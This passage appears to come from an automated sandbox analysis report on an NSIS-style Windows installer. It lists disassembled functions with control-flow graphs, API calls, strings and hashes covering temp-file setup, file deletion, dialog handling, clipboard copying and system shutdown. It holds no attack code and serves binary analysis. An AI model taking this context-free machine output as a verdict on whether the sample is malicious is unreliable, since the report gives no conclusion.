178 404c9a-404c9d 173->178 174->147 175->176 180 404d16-404d19 176->180 181 404d1b-404d24 176->181 177->178 178->173 178->174 183 404d29-404d61 SendMessageA * 2 180->183 181->183 184 404d26 181->184 183->170 184->183
                                      APIs
                                      • GetDlgItem.USER32(?,000003F9), ref: 00404819
                                      • GetDlgItem.USER32(?,00000408), ref: 00404824
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 0040486E
                                      • LoadBitmapA.USER32(0000006E), ref: 00404881
                                      • SetWindowLongA.USER32(?,000000FC,00404DF8), ref: 0040489A
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048AE
                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004048C0
                                      • SendMessageA.USER32(?,00001109,00000002), ref: 004048D6
                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048E2
                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048F4
                                      • DeleteObject.GDI32(00000000), ref: 004048F7
                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404922
                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 0040492E
                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049C3
                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049EE
                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A02
                                      • GetWindowLongA.USER32(?,000000F0), ref: 00404A31
                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A3F
                                      • ShowWindow.USER32(?,00000005), ref: 00404A50
                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B4D
                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BB2
                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BC7
                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BEB
                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C0B
                                      • ImageList_Destroy.COMCTL32(?), ref: 00404C20
                                      • GlobalFree.KERNEL32(?), ref: 00404C30
                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CA9
                                      • SendMessageA.USER32(?,00001102,?,?), ref: 00404D52
                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D61
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D81
                                      • ShowWindow.USER32(?,00000000), ref: 00404DCF
                                      • GetDlgItem.USER32(?,000003FE), ref: 00404DDA
                                      • ShowWindow.USER32(00000000), ref: 00404DE1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                      • String ID: $M$N
                                      • API String ID: 1638840714-813528018
                                      • Opcode ID: d7d8be1d1430912dce9adc548270cedff44170f7b06606a19f6bf33037737e14
                                      • Instruction ID: 73e5042133b470fdde48d750d06e43d2904589ccee469aaf4ee40575ec54014f
                                      • Opcode Fuzzy Hash: d7d8be1d1430912dce9adc548270cedff44170f7b06606a19f6bf33037737e14
                                      • Instruction Fuzzy Hash: 59027FB0900209AFEB10DF54DC85AAE7BB5FB84315F10853AF610B62E1C7799E42CF58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403188 Relevance: 52.7, APIs: 21, Strings: 9, Instructions: 222stringfilecomCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 185 403188-4031a7 call 40564f CharNextA 189 403267-40326b 185->189 190 403271-403305 GetTempPathA call 4030bb DeleteFileA call 402c33 189->190 191 4031ac-403264 call 40564f 189->191 204 40330a-403310 190->204 205 403305 call 402c33 190->205 191->189 203 403266 191->203 203->189 206 4033a4-4033b3 call 403548 OleUninitialize 204->206 207 403316-40331c 204->207 205->204 216 4033b9-4033c9 call 4053a8 ExitProcess 206->216 217 4034ad-4034b3 206->217 208 403394-4033a0 call 403622 207->208 209 40331e-403329 call 40564f 207->209 208->206 220 40332b-403354 209->220 221 40335f-403369 209->221 218 403530-403538 217->218 219 4034b5-4034d2 call 405ea2 * 3 217->219 224 40353a 218->224 225 40353e-403542 ExitProcess 218->225 250 4034d4-4034d6 219->250 251 40351c-403527 ExitWindowsEx 219->251 226 403356-403358 220->226 227 40336b-403378 call 405712 221->227 228 4033cf-4033e9 lstrcatA lstrcmpiA 221->228 224->225 226->221 231 40335a-40335d 226->231 227->206 240 40337a-403390 call 405b77 * 2 227->240 228->206 233 4033eb-403400 CreateDirectoryA SetCurrentDirectoryA 228->233 231->221 231->226 236 403402-403408 call 405b77 233->236 237 40340d-403435 call 405b77 233->237 236->237 246 40343b-403457 call 405b99 DeleteFileA 237->246 240->208 256 403498-40349f 246->256 257 403459-403469 CopyFileA 246->257 250->251 255 4034d8-4034da 250->255 251->218 254 403529-40352b call 40140b 251->254 254->218 255->251 259 4034dc-4034ee GetCurrentProcess 255->259 256->246 260 4034a1-4034a8 call 405a2b 256->260 257->256 261 40346b-40348b call 405a2b call 405b99 call 405347 257->261 259->251 265 4034f0-403512 259->265 260->206 261->256 273 40348d-403494 CloseHandle 261->273 265->251 273->256
                                      APIs
                                      • CharNextA.USER32(00000000,007A8000,00000020), ref: 0040319D
                                      • GetTempPathA.KERNEL32(00000400,007A9400,00000000,00000020), ref: 00403295
                                      • GetWindowsDirectoryA.KERNEL32(007A9400,000003FB), ref: 004032A6
                                      • lstrcatA.KERNEL32(007A9400,\Temp), ref: 004032B2
                                        • Part of subcall function 004030BB: CreateDirectoryA.KERNEL32(007A9400,00000000,007A9400,007A9400,007A9400,75EE3410,0040329C), ref: 004030DC
                                      • GetTempPathA.KERNEL32(000003FC,007A9400,007A9400,\Temp), ref: 004032C6
                                      • lstrcatA.KERNEL32(007A9400,Low), ref: 004032CE
                                      • SetEnvironmentVariableA.KERNEL32(TEMP,007A9400,007A9400,Low), ref: 004032DF
                                      • SetEnvironmentVariableA.KERNEL32(TMP,007A9400), ref: 004032E7
                                      • DeleteFileA.KERNEL32(007A9000), ref: 004032FB
                                      • OleUninitialize.OLE32(?), ref: 004033A9
                                      • ExitProcess.KERNEL32 ref: 004033C9
                                      • lstrcatA.KERNEL32(007A9400,~nsu.tmp,?,?,?), ref: 004033D5
                                      • lstrcmpiA.KERNEL32(007A9400,007A8C00), ref: 004033E1
                                      • CreateDirectoryA.KERNEL32(007A9400,?,?,?,?), ref: 004033ED
                                      • SetCurrentDirectoryA.KERNEL32(007A9400,?,?,?,?), ref: 004033F4
                                      • DeleteFileA.KERNEL32(0079D8B8,0079D8B8,?,007A3000,?,?,?,?,?), ref: 0040344D
                                      • CopyFileA.KERNEL32(007A9C00,0079D8B8,00000001), ref: 00403461
                                      • CloseHandle.KERNEL32(00000000,0079D8B8,0079D8B8,?,0079D8B8,?,?,?,?,?), ref: 0040348E
                                      • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004034E3
                                      • ExitWindowsEx.USER32(00000002), ref: 0040351F
                                      • ExitProcess.KERNEL32 ref: 00403542
                                        • Part of subcall function 0040564F: CharNextA.USER32(?,0040319C,007A8000,00000020), ref: 0040565C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: Directory$ExitFileProcesslstrcat$CharCreateCurrentDeleteEnvironmentNextPathTempVariableWindows$CloseCopyHandleUninitializelstrcmpi
                                      • String ID: "$Error launching installer$Low$SeShutdownPrivilege$TEMP$TMP$\Temp$tvSU*#$~nsu.tmp
                                      • API String ID: 1354997958-186624107
                                      • Opcode ID: 95a040692256d3954bd641e11fd39166ae6047c1d6ff5cc60a8c7adb69f599e9
                                      • Instruction ID: 7605579532f520b864719d0dddd61f0d8e99e1e45b2c1984dcb213f5ff5d7eb5
                                      • Opcode Fuzzy Hash: 95a040692256d3954bd641e11fd39166ae6047c1d6ff5cc60a8c7adb69f599e9
                                      • Instruction Fuzzy Hash: BE71D670A04741BAD7117F715C89A2B3EACEF8670AF04053EF545B62D2CB7C9A018B6E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405454 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159filestringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 879 405454-40547a call 405712 882 405493-40549a 879->882 883 40547c-40548e DeleteFileA 879->883 885 40549c-40549e 882->885 886 4054ad-4054bd call 405b77 882->886 884 40561d-405621 883->884 887 4054a4-4054a7 885->887 888 4055cb-4055d0 885->888 894 4054cc-4054cd call 40566b 886->894 895 4054bf-4054ca lstrcatA 886->895 887->886 887->888 888->884 890 4055d2-4055d5 888->890 892 4055d7-4055dd 890->892 893 4055df-4055e7 call 405e7b 890->893 892->884 893->884 903 4055e9-4055fd call 405624 call 40540c 893->903 897 4054d2-4054d5 894->897 895->897 899 4054e0-4054e6 lstrcatA 897->899 900 4054d7-4054de 897->900 902 4054eb-405509 lstrlenA FindFirstFileA 899->902 900->899 900->902 904 4055c1-4055c5 902->904 905 40550f-405526 call 40564f 902->905 918 405615-405618 call 404e84 903->918 919 4055ff-405602 903->919 904->888 907 4055c7 904->907 912 405531-405534 905->912 913 405528-40552c 905->913 907->888 916 405536-40553b 912->916 917 405547-405555 call 405b77 912->917 913->912 915 40552e 913->915 915->912 921 4055a0-4055b2 FindNextFileA 916->921 922 40553d-40553f 916->922 930 405557-40555f 917->930 931 40556c-405577 call 40540c 917->931 918->884 919->892 924 405604-405613 call 404e84 call 405a2b 919->924 921->905 925 4055b8-4055bb FindClose 921->925 922->917 927 405541-405545 922->927 924->884 925->904 927->917 927->921 930->921 932 405561-40556a call 405454 930->932 939 405598-40559b call 404e84 931->939 940 405579-40557c 931->940 932->921 939->921 941 405590-405596 940->941 942 40557e-40558e call 404e84 call 405a2b 940->942 941->921 942->921
                                      APIs
                                      • DeleteFileA.KERNEL32(?,?), ref: 0040547D
                                      • lstrcatA.KERNEL32(0079FD00,\*.*,0079FD00,?,?), ref: 004054C5
                                      • lstrcatA.KERNEL32(?,00409014,?,0079FD00,?,?), ref: 004054E6
                                      • lstrlenA.KERNEL32(?,?,00409014,?,0079FD00,?,?), ref: 004054EC
                                      • FindFirstFileA.KERNEL32(0079FD00,?,?,?,00409014,?,0079FD00,?,?), ref: 004054FD
                                      • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055AA
                                      • FindClose.KERNEL32(00000000), ref: 004055BB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 2035342205-1173974218
                                      • Opcode ID: c626bdd4990726d426f94ccbeda85fbe9576a558e3f665863e436435b3c03f85
                                      • Instruction ID: 6c887a6cd9596c43cc691a5f5e4ea67afdeb508a4c755cd09b57e0a75bcacbf5
                                      • Opcode Fuzzy Hash: c626bdd4990726d426f94ccbeda85fbe9576a558e3f665863e436435b3c03f85
                                      • Instruction Fuzzy Hash: 6F51C030800A04BACB21AB21CC45BBF7AB9DF42318F54817BF455B11D2D73C9A82DEAD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404FC2 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 279windowclipboardmemoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 11 404fc2-404fdd 12 404fe3-4050ac GetDlgItem * 3 call 403ebc call 404722 GetClientRect GetSystemMetrics SendMessageA * 2 11->12 13 40516e-405175 11->13 34 4050ca-4050cd 12->34 35 4050ae-4050c8 SendMessageA * 2 12->35 15 405177-405199 GetDlgItem CreateThread CloseHandle 13->15 16 40519f-4051ac 13->16 15->16 18 4051ca-4051d1 16->18 19 4051ae-4051b4 16->19 23 4051d3-4051d9 18->23 24 405228-40522c 18->24 21 4051b6-4051c5 ShowWindow * 2 call 403ebc 19->21 22 4051ec-4051f5 call 403eee 19->22 21->18 31 4051fa-4051fe 22->31 29 405201-405211 ShowWindow 23->29 30 4051db-4051e7 call 403e60 23->30 24->22 27 40522e-405231 24->27 27->22 36 405233-405246 SendMessageA 27->36 32 405221-405223 call 403e60 29->32 33 405213-40521c call 404e84 29->33 30->22 32->24 33->32 40 4050dd-4050f4 call 403e87 34->40 41 4050cf-4050db SendMessageA 34->41 35->34 42 405340-405342 36->42 43 40524c-40526d CreatePopupMenu call 405b99 AppendMenuA 36->43 50 4050f6-40510a ShowWindow 40->50 51 40512a-40514b GetDlgItem SendMessageA 40->51 41->40 42->31 48 405282-405288 43->48 49 40526f-405280 GetWindowRect 43->49 53 40528b-4052a3 TrackPopupMenu 48->53 49->53 54 405119 50->54 55 40510c-405117 ShowWindow 50->55 51->42 52 405151-405169 SendMessageA * 2 51->52 52->42 53->42 56 4052a9-4052c0 53->56 57 40511f-405125 call 403ebc 54->57 55->57 58 4052c5-4052e0 SendMessageA 56->58 57->51 58->58 60 4052e2-405302 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 58->60 61 405304-405324 SendMessageA 60->61 61->61 62 405326-40533a GlobalUnlock SetClipboardData CloseClipboard 61->62 62->42
                                      APIs
                                      • GetDlgItem.USER32(?,00000403), ref: 00405021
                                      • GetDlgItem.USER32(?,000003EE), ref: 00405030
                                      • GetClientRect.USER32(?,?), ref: 0040506D
                                      • GetSystemMetrics.USER32(00000015), ref: 00405075
                                      • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405096
                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050A7
                                      • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050BA
                                      • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050C8
                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 004050DB
                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004050FD
                                      • ShowWindow.USER32(?,00000008), ref: 00405111
                                      • GetDlgItem.USER32(?,000003EC), ref: 00405132
                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405142
                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040515B
                                      • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405167
                                      • GetDlgItem.USER32(?,000003F8), ref: 0040503F
                                        • Part of subcall function 00403EBC: SendMessageA.USER32(00000028,?,00000001,00403CED), ref: 00403ECA
                                      • GetDlgItem.USER32(?,000003EC), ref: 00405184
                                      • CreateThread.KERNEL32(00000000,00000000,Function_00004F56,00000000), ref: 00405192
                                      • CloseHandle.KERNEL32(00000000), ref: 00405199
                                      • ShowWindow.USER32(00000000), ref: 004051BD
                                      • ShowWindow.USER32(?,00000008), ref: 004051C2
                                      • ShowWindow.USER32(00000008), ref: 00405209
                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040523B
                                      • CreatePopupMenu.USER32 ref: 0040524C
                                      • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405261
                                      • GetWindowRect.USER32(?,?), ref: 00405274
                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052D3
                                      • OpenClipboard.USER32(00000000), ref: 004052E3
                                      • EmptyClipboard.USER32 ref: 004052E9
                                      • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                                      • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052FC
                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405310
                                      • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405329
                                      • SetClipboardData.USER32(00000001,00000000), ref: 00405334
                                      • CloseClipboard.USER32 ref: 0040533A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                      • String ID: {
                                      • API String ID: 590372296-366298937
                                      • Opcode ID: bac3bf14baff21c7d8ff89fa2b24996a566b9d6b3efb833f2fdcef7c70daf826
                                      • Instruction ID: 5cc5a493c7826af022734a05619d12b61540e90d3b7798cd1ee4812e4cb533c1
                                      • Opcode Fuzzy Hash: bac3bf14baff21c7d8ff89fa2b24996a566b9d6b3efb833f2fdcef7c70daf826
                                      • Instruction Fuzzy Hash: FDA16C70900208BFEB119F60DC85AAE7F79FB44355F00816AFA05BA1A1C7795E41DFA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004039B4 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 274 4039b4-4039c6 275 403b07-403b16 274->275 276 4039cc-4039d2 274->276 278 403b65-403b7a 275->278 279 403b18-403b60 GetDlgItem * 2 call 403e87 SetClassLongA call 40140b 275->279 276->275 277 4039d8-4039e1 276->277 283 4039e3-4039f0 SetWindowPos 277->283 284 4039f6-4039f9 277->284 281 403bba-403bbf call 403ed3 278->281 282 403b7c-403b7f 278->282 279->278 296 403bc4-403bdf 281->296 288 403b81-403b8c call 401389 282->288 289 403bb2-403bb4 282->289 283->284 285 403a13-403a19 284->285 286 4039fb-403a0d ShowWindow 284->286 291 403a35-403a38 285->291 292 403a1b-403a30 DestroyWindow 285->292 286->285 288->289 309 403b8e-403bad SendMessageA 288->309 289->281 295 403e54 289->295 300 403a3a-403a46 SetWindowLongA 291->300 301 403a4b-403a51 291->301 298 403e31-403e37 292->298 297 403e56-403e5d 295->297 303 403be1-403be3 call 40140b 296->303 304 403be8-403bee 296->304 298->295 310 403e39-403e3f 298->310 300->297 307 403af4-403b02 call 403eee 301->307 308 403a57-403a68 GetDlgItem 301->308 303->304 305 403e12-403e2b DestroyWindow EndDialog 304->305 306 403bf4-403bff 304->306 305->298 306->305 312 403c05-403c52 call 405b99 call 403e87 * 3 GetDlgItem 306->312 307->297 313 403a87-403a8a 308->313 314 403a6a-403a81 SendMessageA IsWindowEnabled 308->314 309->297 310->295 316 403e41-403e4a ShowWindow 310->316 344 403c54-403c59 312->344 345 403c5c-403c98 ShowWindow EnableWindow call 403ea9 EnableWindow 312->345 318 403a8c-403a8d 313->318 319 403a8f-403a92 313->319 314->295 314->313 316->295 322 403abd-403ac2 call 403e60 318->322 323 403aa0-403aa5 319->323 324 403a94-403a9a 319->324 322->307 327 403adb-403aee SendMessageA 323->327 329 403aa7-403aad 323->329 324->327 328 403a9c-403a9e 324->328 327->307 328->322 332 403ac4-403acd call 40140b 329->332 333 403aaf-403ab5 call 40140b 329->333 332->307 342 403acf-403ad9 332->342 340 403abb 333->340 340->322 342->340 344->345 348 403c9a-403c9b 345->348 349 403c9d 345->349 350 403c9f-403ccd GetSystemMenu EnableMenuItem SendMessageA 348->350 349->350 351 403ce2 350->351 352 403ccf-403ce0 SendMessageA 350->352 353 403ce8-403d21 call 403ebc call 405b77 lstrlenA call 405b99 SetWindowTextA call 401389 351->353 352->353 353->296 362 403d27-403d29 353->362 362->296 363 403d2f-403d33 362->363 364 403d52-403d66 DestroyWindow 363->364 365 403d35-403d3b 363->365 364->298 367 403d6c-403d99 CreateDialogParamA 364->367 365->295 366 403d41-403d47 365->366 366->296 368 403d4d 366->368 367->298 369 403d9f-403df6 call 403e87 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 367->369 368->295 369->295 374 403df8-403e10 ShowWindow call 403ed3 369->374 374->298
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039F0
                                      • ShowWindow.USER32(?), ref: 00403A0D
                                      • DestroyWindow.USER32 ref: 00403A21
                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A3D
                                      • GetDlgItem.USER32(?,?), ref: 00403A5E
                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A72
                                      • IsWindowEnabled.USER32(00000000), ref: 00403A79
                                      • GetDlgItem.USER32(?,00000001), ref: 00403B27
                                      • GetDlgItem.USER32(?,00000002), ref: 00403B31
                                      • SetClassLongA.USER32(?,000000F2,?), ref: 00403B4B
                                      • SendMessageA.USER32(0000040F,00000000,00000001), ref: 00403B9C
                                      • GetDlgItem.USER32(?,00000003), ref: 00403C42
                                      • ShowWindow.USER32(00000000,?), ref: 00403C63
                                      • EnableWindow.USER32(?,?), ref: 00403C75
                                      • EnableWindow.USER32(?,?), ref: 00403C90
                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CA6
                                      • EnableMenuItem.USER32(00000000), ref: 00403CAD
                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CC5
                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD8
                                      • lstrlenA.KERNEL32(0079ECF8,?,0079ECF8,007A1F00), ref: 00403D01
                                      • SetWindowTextA.USER32(?,0079ECF8), ref: 00403D10
                                      • ShowWindow.USER32(?,0000000A), ref: 00403E44
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                      • String ID:
                                      • API String ID: 184305955-0
                                      • Opcode ID: d971db1fb676f9121a2777190888625fc0312326e765dd8249487f5c43209863
                                      • Instruction ID: 08d6703954b26bba67f61acca2d9aa754b0d4f7535d1ee947126766f28ce6238
                                      • Opcode Fuzzy Hash: d971db1fb676f9121a2777190888625fc0312326e765dd8249487f5c43209863
                                      • Instruction Fuzzy Hash: 42C1C231904200ABEB21AF25ED45E2B7EACF745706F04453EFA41B11E1C77DA982DB6E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403622 Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 216stringregistrylibraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 377 403622-40363a call 405ea2 380 40363c-40364c call 405ad5 377->380 381 40364e-40367f call 405a5e 377->381 389 4036a2-4036cb call 4038e7 call 405712 380->389 385 403681-403692 call 405a5e 381->385 386 403697-40369d lstrcatA 381->386 385->386 386->389 395 4036d1-4036d6 389->395 396 403752-40375a call 405712 389->396 395->396 397 4036d8-4036fc call 405a5e 395->397 402 403768-40378d LoadImageA 396->402 403 40375c-403763 call 405b99 396->403 397->396 407 4036fe-403700 397->407 405 40380e-403816 call 40140b 402->405 406 40378f-4037bf RegisterClassA 402->406 403->402 420 403820-40382b call 4038e7 405->420 421 403818-40381b 405->421 408 4037c5-403809 SystemParametersInfoA CreateWindowExA 406->408 409 4038dd 406->409 411 403711-40371d lstrlenA 407->411 412 403702-40370f call 40564f 407->412 408->405 417 4038df-4038e6 409->417 414 403745-40374d call 405624 call 405b77 411->414 415 40371f-40372d lstrcmpiA 411->415 412->411 414->396 415->414 419 40372f-403739 GetFileAttributesA 415->419 423 40373b-40373d 419->423 424 40373f-403740 call 40566b 419->424 430 403831-40384e ShowWindow LoadLibraryA 420->430 431 4038b4-4038bc call 404f56 420->431 421->417 423->414 423->424 424->414 433 403850-403855 LoadLibraryA 430->433 434 403857-403869 GetClassInfoA 430->434 439 4038d6-4038d8 call 40140b 431->439 440 4038be-4038c4 431->440 433->434 436 403881-4038b2 DialogBoxParamA call 40140b call 403572 434->436 437 40386b-40387b GetClassInfoA RegisterClassA 434->437 436->417 437->436 439->409 440->421 442 4038ca-4038d1 call 40140b 440->442 442->421
                                      APIs
                                        • Part of subcall function 00405EA2: GetModuleHandleA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EB4
                                        • Part of subcall function 00405EA2: LoadLibraryA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EBF
                                        • Part of subcall function 00405EA2: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED0
                                      • lstrcatA.KERNEL32(007A9000,0079ECF8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079ECF8,00000000,00000006,007A9400,75EE3410), ref: 0040369D
                                      • lstrlenA.KERNEL32(007A16A0,007A8400,?,?,007A16A0,00000000,007A8400,007A9000,0079ECF8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079ECF8,00000000,00000006,007A9400), ref: 00403712
                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 00403725
                                      • GetFileAttributesA.KERNEL32(007A16A0), ref: 00403730
                                      • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,007A8400), ref: 00403779
                                        • Part of subcall function 00405AD5: wsprintfA.USER32 ref: 00405AE2
                                      • RegisterClassA.USER32(007A1EA0), ref: 004037B6
                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004037CE
                                      • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403803
                                      • ShowWindow.USER32(00000005), ref: 00403839
                                      • LoadLibraryA.KERNEL32(RichEd20), ref: 0040384A
                                      • LoadLibraryA.KERNEL32(RichEd32), ref: 00403855
                                      • GetClassInfoA.USER32(00000000,RichEdit20A,007A1EA0), ref: 00403865
                                      • GetClassInfoA.USER32(00000000,RichEdit,007A1EA0), ref: 00403872
                                      • RegisterClassA.USER32(007A1EA0), ref: 0040387B
                                      • DialogBoxParamA.USER32(?,00000000,004039B4,00000000), ref: 0040389A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                      • API String ID: 914957316-2904746566
                                      • Opcode ID: fcf350a16533a8f7f48c774a1ae8809bdd7b9640d83f0523be5dbe97f1948a0b
                                      • Instruction ID: b0afc0e10dc8cbe2448bed9474bc03f366f348945261fe302a10aac9679cd79a
                                      • Opcode Fuzzy Hash: fcf350a16533a8f7f48c774a1ae8809bdd7b9640d83f0523be5dbe97f1948a0b
